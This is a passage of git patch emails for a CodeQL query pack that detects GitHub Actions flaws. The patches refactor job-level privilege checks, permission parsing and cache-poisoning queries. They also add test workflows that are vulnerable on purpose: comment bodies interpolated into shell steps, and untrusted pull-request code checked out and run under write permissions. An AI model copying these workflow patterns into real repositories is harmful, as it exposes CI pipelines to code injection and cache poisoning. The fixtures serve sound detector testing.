TPermissionsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("permissions") = n) } or TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or @@ -320,6 +320,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets a job within this workflow */ JobImpl getAJob() { result = this.getJob(_) } + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + /** Workflow is triggered by given trigger event */ predicate hasTriggerEvent(string trigger) { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) @@ -330,43 +333,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) } - /** Gets the permissions granted to this workflow. */ - PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - - /** Holds if the workflow is privileged. */ - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpressionImpl expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, WorkflowImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 - } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { @@ -502,7 +470,7 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { } class PermissionsImpl extends AstNodeImpl, TPermissionsNode { - YamlMapping n; + YamlMappingLikeNode n; PermissionsImpl() { this = TPermissionsNode(n) } @@ -516,11 +484,41 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } - override YamlMapping getNode() { result = n } + override YamlMappingLikeNode getNode() { result = n } - string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + string getAScope() { + result = + [ + "actions", "attestations", "checks", "contents", "deployments", "discussions", "id-token", + "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", + "statuses" + ] + } - string getAPermission() { result = this.getPermission(_) } + string getAPermission() { + exists(YamlMapping mapping, string scope | + mapping = n and + result = scope + ": " + mapping.lookup(scope).(YamlScalar).getValue() + ) + or + exists(YamlScalar scalar | + scalar = n and + ( + scalar.getValue() = "write-all" and + result = this.getAScope() + ":write" + or + scalar.getValue() = "read-all" and + result = this.getAScope() + ":read" + ) + ) + } + + bindingset[perm] + string getPermission(string perm) { + exists(string p | + p = this.getAPermission() and p.matches(perm + ":%") and result = p.splitAt(":", 1).trim() + ) + } } class StrategyImpl extends AstNodeImpl, TStrategyNode { @@ -633,37 +631,87 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the workflow is privileged. */ + /** Holds if the job is privileged. */ predicate isPrivileged() { - // the job has an explicit write permission - this.getPermissions().getAPermission() = "write" + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() or + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() + or + // neither the job nor the workflow have permissions but the job has a privileged trigger + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.hasPrivilegedTrigger() + } + + private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) - or - // the effective permissions have write access + } + + private predicate hasExplicitWritePermission() { + // the job has an explicit write permission + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + + private predicate hasRuntimeWritePermissions() { + // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and // We cannot trust the permissions for pull_request events since they depend on the - // location of the head branch + // provenance of the head branch (local vs fork) not trigger.trim() = "pull_request" and - ( - secrets_source.trim().toLowerCase() = "actions" or - perms.toLowerCase().matches("%write%") - ) + perms.toLowerCase().matches("%write%") + ) + } + + private predicate hasPrivilegedTrigger() { + // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. + // The Job is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, JobImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getEnclosingJob() and + caller.isPrivileged() ) or - // The job has no expliclit permission, but the enclosing workflow is privileged - not exists(this.getPermissions()) and - not exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) and - // The enclosing workflow is privileged - this.getEnclosingWorkflow().isPrivileged() + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. */ + string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 } /** Gets the runs-on field of the job. */ @@ -825,11 +873,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + if u.getValue().matches("./%") + then result = u.getValue() + else + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 5c0528c4551..1181cd1e755 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index e45075552ab..bf2cf129fbf 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and not checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From 2d09d1e6d88d0fa9198f3274505d02567acb5f45 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:34:30 +0200 Subject: [PATCH 0254/1267] Fix alert text --- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 2de07ec17bd..e02b64e9ec5 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -37,5 +37,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, + "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 44377acb0811775441b855ed214132ff6d283813 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:06 +0200 Subject: [PATCH 0255/1267] Improve Cache Poisoning quer --- ql/src/Security/CWE-349/CachePoisoning.ql | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797d..12be71af43e 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -16,8 +16,10 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout, Step s where + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() and // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? @@ -37,10 +39,13 @@ where ( // The job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() instanceof CacheWritingStep + j.getAStep() = s and + s instanceof CacheWritingStep or // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() = s and + s instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Untrusted checked-out code may lead to cache poisoning on step $@.", s, + s.toString() From d2e9411e129380691ebacb645a1fbd74bea3c572 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:17 +0200 Subject: [PATCH 0256/1267] Update and new tests --- .../CWE-349/.github/workflows/test1.yml | 1 + .../CWE-349/.github/workflows/test10.yml | 12 +++++++++ .../CWE-349/.github/workflows/test11.yml | 24 +++++++++++++++++ .../CWE-349/.github/workflows/test12.yml | 21 +++++++++++++++ .../CWE-349/.github/workflows/test2.yml | 2 ++ .../CWE-349/.github/workflows/test3.yml | 2 ++ .../CWE-349/.github/workflows/test4.yml | 4 +++ .../CWE-349/.github/workflows/test5.yml | 2 ++ .../CWE-349/.github/workflows/test6.yml | 1 + .../CWE-349/.github/workflows/test7.yml | 1 + .../CWE-349/.github/workflows/test8.yml | 26 ++++++++++++++++--- .../CWE-349/.github/workflows/test9.yml | 2 +- .../Security/CWE-349/CachePoisoning.expected | 14 +++++----- .../CachePoisoningByCodeInjection.expected | 3 ++- ...ivilegedUntrustedCheckoutCritical.expected | 1 + .../PrivilegedUntrustedCheckoutHigh.expected | 1 - 16 files changed, 104 insertions(+), 13 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml index 75e03886d48..55efe8e9fec 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml @@ -4,6 +4,7 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest steps: - uses: xt0rted/pull-request-comment-branch@v2 diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml new file mode 100644 index 00000000000..eba5e79229b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: write-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml new file mode 100644 index 00000000000..3849d92cbcc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml @@ -0,0 +1,24 @@ +on: + issue_comment: + types: [created] + +permissions: write-all + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml new file mode 100644 index 00000000000..e2c435af62d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml @@ -0,0 +1,21 @@ +on: + issue_comment: + types: [created] + +permissions: + issues: write +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml index 6a6595d929e..eb6373a406e 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml @@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: read-all + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml index 2c684b6a02d..fa56d074936 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: {} + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml index b5ea127ebd3..03eb9e99f0f 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml @@ -2,9 +2,13 @@ name: Cache Poisoning on: pull_request_target +permissions: + contents: read + jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml index 9bc6cc98056..b7454d0a0dc 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -5,6 +5,8 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: + contents: read steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml index b5ef835210b..2fa898982bc 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml @@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml index d0ff8c180fe..be83f83cf30 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml index 68d3f7f75ac..05f8e4a067a 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -5,15 +5,33 @@ on: jobs: pr-comment: runs-on: ubuntu-latest + permissions: read-all steps: - uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - uses: actions/checkout@v3 - if: success() with: ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: ./checkedout/poison - - run: | - ./checkedout/poison + pr-comment2: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - uses: ./.github/actions/node-npm-setup + pr-comment3: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: node .github/actions-scripts/what-docs-early-access-branch.js diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml index 3b646b795ac..9f19634abc9 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml @@ -4,8 +4,8 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest - permissions: {} steps: - run: | echo ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 67cdea32c5d..841a3ee4071 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,6 +1,8 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected index 5f244aa2faf..60c25e1cd92 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -1,6 +1,7 @@ edges nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected index ff65e165812..ca86bac14f0 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected @@ -1,3 +1,4 @@ +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915f..a40ab1fa771 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,3 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1ea0312f362e90cb43895ae235884cc26f3684a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:25 +0200 Subject: [PATCH 0257/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f07d6c40046..e68a4c67cc4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.21 +version: 0.0.22 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 13f053a40da..465be503e7c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.21 +version: 0.0.22 groups: - actions - queries From d6fb0ae84ed1dfd7f829fc2f4a4d6228863f05dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:41:05 +0200 Subject: [PATCH 0258/1267] Update tests --- .../Security/CWE-349/CachePoisoning.expected | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 841a3ee4071..75a370246cb 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,8 +1,8 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | From a30c2aa5def74c81e84f2ae8eff890ca8f615e49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: 